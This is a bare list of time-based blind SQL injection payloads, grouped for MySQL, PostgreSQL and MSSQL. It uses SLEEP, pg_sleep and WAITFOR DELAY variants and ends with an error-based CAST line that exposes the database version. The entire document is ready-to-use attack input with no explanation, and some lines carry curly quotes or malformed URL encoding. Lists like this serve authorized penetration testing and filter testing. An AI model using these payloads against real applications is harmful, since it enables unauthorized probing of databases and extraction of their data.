 ##MySQL Payloads

' OR SLEEP(5)--
' OR SLEEP(5)#
' OR SLEEP(5)='
" OR SLEEP(5)#
" OR SLEEP(5)="
') OR SLEEP(5)='
')) OR SLEEP(5)='
AnD SLEEP(5)
AnD SLEEP(5)#
AnD SLEEP(5)--
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)#
ORDER BY SLEEP(5)--
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
+ SLEEP(10) + '
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
1'XOR(94102*if(now()=sysdate(),sleep(6),0))XOR'Z
if(now()=sysdate(),sleep(20),0)
'XOR(if(now()=sysdate(),sleep(33),0))OR'
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
(SELECT(0)FROM(SELECT(SLEEP(10)))a)
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe'
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT 7415 FROM (SELECT(SLEEP(10)))CwkU) AND (7515=7515


##PostgreSQL Payloads

' OR pg_sleep(5)--
" OR pg_sleep(5)--
‘ OR pg_sleep(5) --
1 OR pg_sleep(5) --
1) OR pg_sleep(5)--
1)) OR pg_sleep(5)--
') OR pg_sleep(5)--
')) OR pg_sleep(5)--
or SELECT pg_sleep(5);
(SELECT pg_sleep(5))
pg_sleep(5)--
pg_SLEEP(5)
pg_SLEEP(5)#
pg_SLEEP(5)--
') OR 11=(SELECT 11 FROM PG_SLEEP(6))--
');(SELECT 4564 FROM PG_SLEEP(5))--

##MSSQL Payloads

'));waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
;waitfor delay '00:00:05'
;waitfor delay '00:00:05'#
;waitfor delay '00:00:05'--
;waitfor delay ‘0:0:5’ —-
‘;WAITFOR DELAY ‘0:0:5’ —-
“;waitfor delay ‘0:0:5’ —-
‘);waitfor delay ‘0:0:5’ —-
“);waitfor delay ‘0:0:5’ —-
“));waitfor delay ‘0:0:5’ —-
‘));waitfor delay ‘0:0:5’ —-
“));waitfor delay ‘0:0:5’ —-
“);waitfor delay ‘0:0:5’ —-
';%20waitfor%20delay%20'0:0:6'%20--%20
‘;%5waitfor%5delay%5’0:0:5'%5 -- %5
132'; waitfor delay '0:0:6' -- 
'>;WAITFOR DELAY '00:00:5'--
' WAITFOR DELAY ‘0:0:5’ —-
' AND 1=CAST((SELECT version()) AS int) --
